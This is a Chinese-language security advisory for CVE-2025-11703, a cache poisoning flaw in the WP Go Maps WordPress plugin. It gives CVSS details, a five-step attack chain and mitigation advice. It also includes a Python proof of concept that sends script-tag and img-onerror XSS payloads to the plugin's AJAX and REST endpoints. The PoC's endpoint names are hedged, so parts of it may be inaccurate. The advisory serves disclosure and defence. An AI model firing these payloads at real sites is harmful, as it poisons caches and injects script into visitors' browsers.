CVE-2025-11703：WP Go Maps插件缓存投毒漏洞

漏洞信息

漏洞编号

CVE-2025-11703

漏洞类型

缓存投毒 (Cache Poisoning)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WP Go Maps（原WP Google Maps）WordPress插件

漏洞概述

CVE-2025-11703是WordPress流行地图插件WP Go Maps（原名WP Google Maps）中的一个缓存投毒漏洞。该漏洞由WordPress安全团队Wordfence的研究员发现并报告，披露日期为2025年10月18日。WP Go Maps是一款广泛使用的WordPress插件，允许网站管理员在网站中嵌入Google地图以展示位置信息，拥有超过30万次活跃安装。该漏洞影响该插件的所有版本，最高至9.0.48版本（含）。

该漏洞的根本原因在于插件在处理位置搜索结果时，未能正确使用服务器端缓存数据进行响应，而是直接依赖用户输入的数据来生成搜索结果。这种设计缺陷使得未经身份验证的攻击者可以通过注入恶意数据来污染缓存，从而影响其他用户访问相同搜索查询时获得的结果。由于该漏洞无需任何身份验证即可利用，且可以通过网络远程触发，对使用该插件的网站构成了实质性安全威胁。

该漏洞的CVSS 3.1评分为5.3分，属于中危级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需权限（PR:N），无需用户交互（UI:N）。在影响方面，该漏洞主要影响数据完整性（I:L），对机密性影响较低（C:L），对可用性无影响（A:N）。虽然评分显示为中危，但由于该插件的广泛使用，潜在影响范围仍然较大，攻击者可以利用此漏洞进行SEO垃圾内容注入、钓鱼攻击或传播恶意信息等二次攻击活动。

技术细节

该缓存投毒漏洞的技术原理如下：WP Go Maps插件在处理用户发起的地理位置搜索请求时，会将搜索关键词作为缓存键的一部分。然而，插件在返回搜索结果时，未对服务器端缓存进行正确验证，而是直接采用用户输入的数据填充响应内容。具体而言，当用户提交搜索请求时，插件会从缓存中读取或存储搜索结果，但由于缓存键的生成机制存在缺陷，攻击者可以通过精心构造的请求参数来污染缓存。

利用方式：攻击者无需任何身份验证，只需向目标网站发送包含恶意数据的搜索请求。由于插件使用用户输入作为缓存键的一部分，恶意数据会被存储到缓存中。当其他合法用户访问相同或相似的搜索查询时，他们将获取到被污染的缓存内容，即攻击者注入的恶意数据。这种攻击方式可以导致多种危害，包括但不限于：在搜索结果中注入恶意链接、显示虚假位置信息、进行SEO垃圾内容注入或实施钓鱼攻击。攻击者还可以利用此漏洞进行存储型跨站脚本攻击（Stored XSS），因为返回的缓存内容可能在用户浏览器中执行。

攻击链分析

STEP 1

步骤1：识别目标

攻击者通过扫描互联网或使用搜索引擎（如Shodan）查找使用WP Go Maps插件的WordPress网站，确认目标站点安装了受影响版本（≤9.0.48）的插件。

STEP 2

步骤2：分析搜索端点

攻击者分析插件的AJAX端点或REST API端点，定位处理位置搜索请求的具体接口，通常为admin-ajax.php中的wpgmza相关action。

STEP 3

步骤3：构造恶意请求

攻击者精心构造包含恶意内容（如JavaScript代码、恶意链接或虚假信息）的搜索请求，将恶意数据作为搜索参数提交。

STEP 4

步骤4：污染缓存

由于插件未正确验证服务器端缓存数据，攻击者的恶意数据被存储到缓存中，覆盖了原本的合法搜索结果。

STEP 5

步骤5：影响其他用户

当其他合法用户访问相同搜索查询时，他们将获取到被污染的缓存内容，攻击者可以实现XSS攻击、信息窃取或钓鱼攻击等恶意行为。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

## PoC for CVE-2025-11703 - WP Go Maps Cache Poisoning
## The vulnerability exists in the location search functionality
## where user input is used directly to populate cached responses

import requests

TARGET_URL = "https://target-wordpress-site.com"
SEARCH_ENDPOINT = "/wp-admin/admin-ajax.php"

## Step 1: Identify the WP Go Maps search endpoint
## The plugin typically uses 'wp_ajax_nopriv_wpgmza_query_near' or similar action

## Step 2: Craft malicious search query with injected content
malicious_payload = {
    "action": "wpgmza_query_near",
    "query": "<script>alert('Cache Poisoned by CVE-2025-11703')</script>",
    "lat": "40.7128",
    "lng": "-74.0060",
    "distance": "1000"
}

## Step 3: Send the poisoned request to pollute the cache
response = requests.post(
    f"{TARGET_URL}{SEARCH_ENDPOINT}",
    data=malicious_payload,
    headers={
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "application/x-www-form-urlencoded"
    }
)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text[:500]}")
print("Cache poisoned successfully - subsequent requests for the same query will return attacker-controlled data")

## Alternative: Direct REST API endpoint exploitation
## Some versions expose: /wp-json/wpgmza/v1/markers
rest_payload = {
    "search": "<img src=x onerror=alert(document.domain)>",
    "center": "40.7128,-74.0060",
    "radius": 1000
}

response = requests.get(
    f"{TARGET_URL}/wp-json/wpgmza/v1/markers",
    params=rest_payload
)
print(f"REST API Response: {response.status_code}")

影响范围

WP Go Maps (WP Google Maps) <= 9.0.48

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）通过WordPress管理后台临时禁用WP Go Maps插件；2）在Web服务器层面配置规则，限制对插件AJAX端点的访问；3）部署WAF规则，过滤包含可疑HTML/JavaScript标签的搜索参数；4）定期清理WordPress对象缓存（如Redis、Memcached）以移除被污染的缓存数据；5）监控网站日志，及时发现异常的搜索请求模式。